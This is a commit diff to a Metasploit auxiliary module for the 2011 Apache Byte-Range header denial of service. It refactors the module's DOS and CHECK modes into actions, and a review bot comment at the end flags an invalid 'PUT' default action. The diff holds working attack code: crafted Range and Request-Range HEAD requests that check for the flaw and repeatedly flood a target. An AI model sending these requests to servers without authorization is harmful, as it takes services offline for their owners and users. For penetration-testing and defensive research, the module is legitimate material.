Uses "ACTIONS" keys instead of datastore options

It's better to use ACTIONS instead of datastore in this case. Also,
did some cleanup.
unstable
sinn3r 2013-04-22 15:41:47 -05:00
parent 1714fa21b1
commit 7e28a4ddb0
1 changed files with 35 additions and 34 deletions


@ -1,7 +1,3 @@
##
# $Id$
##
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
@ -35,7 +31,12 @@ class Metasploit3 < Msf::Auxiliary
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability 'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision$', 'Actions' =>
[
['DOS'],
['CHECK']
],
'DefaultAction' => 'PUT',
'References' => 'References' =>
[ [
[ 'BID', '49303'], [ 'BID', '49303'],
@ -43,43 +44,44 @@ class Metasploit3 < Msf::Auxiliary
[ 'EDB', '17696'], [ 'EDB', '17696'],
[ 'OSVDB', '74721' ], [ 'OSVDB', '74721' ],
], ],
'DisclosureDate' => 'Aug 19 2011', 'DisclosureDate' => 'Aug 19 2011'
)) ))
register_options( register_options(
[ [
Opt::RPORT(80), Opt::RPORT(80),
OptString.new('URI', [ true, "The request URI", '/']), OptString.new('URI', [ true, "The request URI", '/']),
OptInt.new('RLIMIT', [ true, "Number of requests to send",50]), OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
OptEnum.new('ACTION', [true, "DOS or CHECK", "DOS",["DOS","CHECK"]])
], self.class) ], self.class)
end end
def run_host(ip) def run_host(ip)
case datastore['action'] case action.name
when 'DOS'
conduct_dos()
when 'DOS' when 'CHECK'
conduct_dos() check_for_dos()
when 'CHECK'
check_for_dos()
end end
end end
def check_for_dos() def check_for_dos()
path = datastore['URI'] path = datastore['URI']
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => path, 'uri' => path,
'method' => 'HEAD', 'method' => 'HEAD',
'headers' => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} }) 'headers' => {
"HOST" => "Localhost",
if (res and res.code == 206) "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
print_status("Response was #{res.code}") }
print_status("Found Byte-Range Header DOS at #{path}") })
if (res and res.code == 206)
print_status("Response was #{res.code}")
print_status("Found Byte-Range Header DOS at #{path}")
report_note( report_note(
:host => rhost, :host => rhost,
@ -87,16 +89,13 @@ class Metasploit3 < Msf::Auxiliary
:data => "Apache Byte-Range DOS at #{path}" :data => "Apache Byte-Range DOS at #{path}"
) )
else else
print_status("#{rhost} doesn't seem to be vulnerable at #{path}") print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE rescue ::Timeout::Error, ::Errno::EPIPE
end end
end end
@ -111,10 +110,12 @@ class Metasploit3 < Msf::Auxiliary
begin begin
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}") print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'HEAD', 'method' => 'HEAD',
'headers' => { "HOST" => rhost, 'headers' => {
"Range" => "bytes=0-#{ranges}"}},1) "HOST" => rhost,
"Range" => "bytes=0-#{ranges}"}},1)
rescue ::Rex::ConnectionRefused rescue ::Rex::ConnectionRefused
print_status("Unable to connect to #{rhost}:#{rport}.") print_status("Unable to connect to #{rhost}:#{rport}.")
rescue ::Errno::ECONNRESET rescue ::Errno::ECONNRESET
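Review bot: `'DefaultAction' => 'PUT'` in the module-info hunk does not name either declared action (`DOS`, `CHECK`). When the user sets no ACTION, the default lookup presumably resolves to nothing, and `case action.name` in `run_host` would then raise on nil rather than run anything. The default should name a declared action: `'DefaultAction' => 'CHECK'` is the non-disruptive choice, while `'DOS'` keeps the default of the removed `OptEnum`. An `else` branch in `run_host` that reports the unrecognised action via `print_error` would also surface a bad value instead of silently doing nothing. The info hash and `initialize` begin outside the visible hunks, so this is judged only from the lines shown.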